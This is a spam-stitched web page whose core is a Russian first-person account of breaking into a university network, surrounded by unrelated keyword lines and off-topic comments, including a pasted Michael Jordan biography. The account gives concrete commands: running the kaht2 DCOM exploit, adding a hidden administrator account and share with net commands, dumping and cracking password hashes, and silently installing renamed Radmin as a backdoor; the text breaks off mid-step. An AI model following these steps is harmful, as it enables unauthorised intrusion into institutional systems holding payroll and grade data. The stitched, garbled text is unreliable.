фотографы Москвы

светлана якубовская фотограф инстаграм москва

узбекистан хова йоллары авиабилет

копирование и распостранение данной статьи запрещено. права на статью принадлежат её автору. данная статья несет чисто информативный харктер и не служит руководством к действию, а лишь показывает распостранные ошибки системных администраторов. passwords, logins and names are changed. краткое описание сети: сеть университета. сеть класса в, имеет доступ к internet через прокси сервер, содержит в себе компьютеры преподавателей, бухгалтерии, высшего руководства университета, студенческие классы и базы данных (зарплата, оценки, вступительные экзаменны). software: windows 2000 sp4 windows xp sp1 sp2, windows 2000 server. попав в компьютерный класс своего университета, я сразу решил проверить сеть на устойчивость и защищенность. для этого использовался самый примитивный набор hacktools и software. машины в компьютерном классе для студентов имели ограниченную учетную запись user типа пользователь. отсутствие возможностей по установке приложений не давало ограничения по запуску консольных приложений поэтому, открыв подставной бесплатный почтовый ящик, я скинул туда эксплоит kaht2 (kaht2.exe уязвимость в службе dcom (win 2000/xp) эксплоит kaht2.exe можно скачать по ссылке http://www.securitylab.ru/_exploits/kaht2.zip ) распаковав его на локальной машине, атакую соседние машины, получив шелл вида c:winntsystem32 провожу следующие действия net user hacker /add net localgroup администраторы hacker /add net share c=c: /add далее соединяемся с атакованной машиной на диск с и кидаем туда gethashes.exe (утилита из программы saminside ). с шелла запускаем gethashes.exe с параметром $local получаем локальные пароли зашифрованные hash функцией используя бесплатный сервис http://passcrack.spb.ru/ по восстановлению md5 hash получаем пароль локального администратора, который в нашем случае подходит к большинству машин компьютерного класса. распаковываем radmin устанавливаем на локальную машины имея права администратора, переписываем c:program files admin в произвольное место, заменяем r_server.exe на произвольное название на нашем примере это alg.exe. заливаем на взломанную машину в папку c:winntsystem32 c этой папки запускаем r_server /install r_server /port: 555 /save /silence r_server /pass: hacked /save /silence r_server /start после этого открываем на локальной машине regedit.exe подключаем сетевой реестр взломанной машины hkey_local_machinesystem adminv2.










Comments on this entry (2 comments)

Enjoy this Post? You can discuss and share your opinion about it! Just do it over here.

Yep realy interesting interview – it reminds me of myself. Also web developer, music freak producer and working in web :)

Posted on August 11th 2009

Michael Jeffrey Jordan (born February 17, 1963) is a retired American professional basketball player and active businessman. His biography on the National Basketball Association (NBA) website states, "By acclamation, Michael Jordan is the greatest basketball player of all time."[1] Jordan was one of the most effectively marketed athletes of his generation and was instrumental in popularizing the NBA around the world in the 1980s and 1990s.

Posted on August 11th 2009

Add Your Comment